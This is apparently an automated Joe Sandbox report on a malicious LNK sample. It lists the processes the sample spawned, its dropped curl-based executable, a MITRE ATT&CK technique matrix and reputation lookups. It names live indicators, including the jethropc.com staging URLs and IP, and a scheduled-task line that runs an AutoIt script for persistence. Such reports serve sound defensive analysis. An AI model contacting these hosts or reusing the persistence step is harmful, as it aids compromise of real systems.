    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DEBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_00007FF7F1DEBAFC
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DDF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,8_2_00007FF7F1DDF964
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,8_2_00007FF7F1DB2B14
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DD2930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,8_2_00007FF7F1DD2930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DD0070 calloc,calloc,calloc,bind,WSAGetLastError,8_2_00007FF7F1DD0070
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E8F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,12_2_00007FF700E8F964
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E82930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,12_2_00007FF700E82930
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E62B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,12_2_00007FF700E62B14
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 12_2_00007FF700E80070 calloc,calloc,calloc,bind,WSAGetLastError,12_2_00007FF700E80070
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts312
    Command and Scripting Interpreter
    1
    Scheduled Task/Job
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    21
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Scheduled Task/Job
    1
    Registry Run Keys / Startup Folder
    1
    Scheduled Task/Job
    21
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    Native API
    1
    DLL Side-Loading
    1
    Registry Run Keys / Startup Folder
    11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login Hook1
    DLL Side-Loading
    11
    Deobfuscate/Decode Files or Information
    NTDS12
    Process Discovery
    Distributed Component Object ModelInput Capture4
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    File Deletion
    DCSync12
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430699 Sample: knfV5IVjEV Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 40 jethropc.com 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Windows shortcut file (LNK) starts blacklisted processes 2->46 48 7 other signatures 2->48 9 cmd.exe 3 2->9         started        signatures3 process4 file5 34 C:behaviorgraphSlLzFnTovbehaviorgraphSlLzFnTov.exe, PE32+ 9->34 dropped 56 Windows shortcut file (LNK) starts blacklisted processes 9->56 58 Suspicious powershell command line found 9->58 60 Uses cmd line tools excessively to alter registry or file data 9->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 9->62 13 powershell.exe 17 9->13         started        16 GSlLzFnTov.exe 2 9->16         started        19 GSlLzFnTov.exe 2 9->19         started        21 3 other processes 9->21 signatures6 process7 dnsIp8 64 Windows shortcut file (LNK) starts blacklisted processes 13->64 66 Obfuscated command line found 13->66 68 Very long command line found 13->68 70 2 other signatures 13->70 23 cmd.exe 13->23         started        36 jethropc.com 162.241.216.65, 443, 49703, 49706 UNIFIEDLAYER-AS-1US United States 16->36 38 127.0.0.1 unknown unknown 16->38 signatures9 process10 signatures11 50 Windows shortcut file (LNK) starts blacklisted processes 23->50 52 Suspicious powershell command line found 23->52 54 Uses cmd line tools excessively to alter registry or file data 23->54 26 GSlLzFnTov.exe 1 23->26         started        28 GSlLzFnTov.exe 1 23->28         started        30 conhost.exe 1 23->30         started        32 3 other processes 23->32 process12

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    knfV5IVjEV.lnk21%ReversingLabsWin32.Trojan.Pantera
    knfV5IVjEV.lnk30%VirustotalBrowse
    knfV5IVjEV.lnk100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\GSlLzFnTov\GSlLzFnTov.exe0%ReversingLabs
    C:\GSlLzFnTov\GSlLzFnTov.exe0%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    jethropc.com0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
    https://go.micro0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com0%Avira URL Cloudsafe
    https://curl.se/libcurl/c/curl_easy_setopt.html0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz0%Avira URL Cloudsafe
    https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_0%Avira URL Cloudsafe
    http://www.microsoft.co0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e0%Avira URL Cloudsafe
    https://curl.se/docs/http-cookies.html0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##0%Avira URL Cloudsafe
    https://curl.se/docs/sslcerts.html0%Avira URL Cloudsafe
    http://www.microsoft.co1%VirustotalBrowse
    https://curl.se/docs/sslcerts.htmlcurl0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
    https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T0%Avira URL Cloudsafe
    https://curl.se/libcurl/c/curl_easy_setopt.html0%VirustotalBrowse
    https://curl.se/docs/sslcerts.htmlcurl0%VirustotalBrowse
    https://curl.se/0%Avira URL Cloudsafe
    https://curl.se/docs/sslcerts.html0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%VirustotalBrowse
    https://curl.se/docs/copyright.html0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html#0%Avira URL Cloudsafe
    https://curl.se/0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji20%Avira URL Cloudsafe
    https://curl.se/P0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html#0%VirustotalBrowse
    https://curl.se/docs/http-cookies.html#0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu0%Avira URL Cloudsafe
    https://curl.se/docs/copyright.htmlD0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey00%Avira URL Cloudsafe
    https://curl.se/docs/copyright.html0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago0%Avira URL Cloudsafe
    https://curl.se/docs/http-cookies.html#0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey10%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=0%Avira URL Cloudsafe
    https://curl.se/P0%VirustotalBrowse
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1y0%Avira URL Cloudsafe
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago0%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    jethropc.com
    162.241.216.65
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0false
    • Avira URL Cloud: safe
    unknown
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1false
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.comGSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      https://curl.se/libcurl/c/curl_easy_setopt.htmlGSlLzFnTov.exe.1.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rzGSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmptrue
      • URL Reputation: malware
      unknown
      https://curl.se/docs/http-cookies.htmlGSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://go.micropowershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: safe
        unknown
        https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.microsoft.copowershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1eGSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://curl.se/docs/sslcerts.htmlGSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://curl.se/docs/sslcerts.htmlcurlGSlLzFnTov.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/docs/hsts.htmlGSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/docs/copyright.htmlDGSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1TGSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/GSlLzFnTov.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wzGSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/docs/copyright.htmlGSlLzFnTov.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/docs/hsts.html#GSlLzFnTov.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##OGSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore68powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://curl.se/PGSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://curl.se/docs/http-cookies.html#GSlLzFnTov.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comquGSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://jethropc.com/wp-admin/css/temp/hurry/?rv=papagoknfV5IVjEV.lnktrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://jethropc.com/wp-admin/css/temp/hurry/?rv=powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1yGSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                162.241.216.65
                jethropc.comUnited States
                46606UNIFIEDLAYER-AS-1UStrue
                IP
                127.0.0.1
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1430699
                Start date and time:2024-04-24 03:01:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:knfV5IVjEV.lnk
                (renamed file extension from none to lnk, renamed because original name is a hash value)
                Original Sample Name:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
                Detection:MAL
                Classification:mal100.rans.evad.winLNK@25/11@1/2
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 65
                • Number of non-executed functions: 231
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                TimeTypeDescription
                03:02:10API Interceptor15x Sleep call for process: powershell.exe modified
                03:02:26Task SchedulerRun new task: QwbpjvdmTA path: c:\GSlLzFnTov\AutoIt3.exe s>c:\GSlLzFnTov\QwbpjvdmTA.au3
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                UNIFIEDLAYER-AS-1UShttp://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                • 69.49.230.31
                CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 192.185.13.234
                Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                • 162.144.15.164
                DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 192.185.13.234
                https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370Get hashmaliciousUnknownBrowse
                • 162.241.225.201
                DHL INVOICE.scr.exeGet hashmaliciousAgentTeslaBrowse
                • 192.185.171.184
                PO No. 2430800015.exeGet hashmaliciousAgentTeslaBrowse
                • 162.241.225.141
                DHL_RF_20200712_BN_N0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 192.185.13.234
                CR-FEDEX_TN-775537409198_Doc.vbsGet hashmaliciousUnknownBrowse
                • 192.185.84.89
                http://vgjlx.app.link/e/0ZWlI0Ci1IbGet hashmaliciousUnknownBrowse
                • 162.241.225.18
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                74954a0c86284d0d6e1c4efefe92b521SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                • 162.241.216.65
                23-April-24-ACH-7fa67756.jarGet hashmaliciousUnknownBrowse
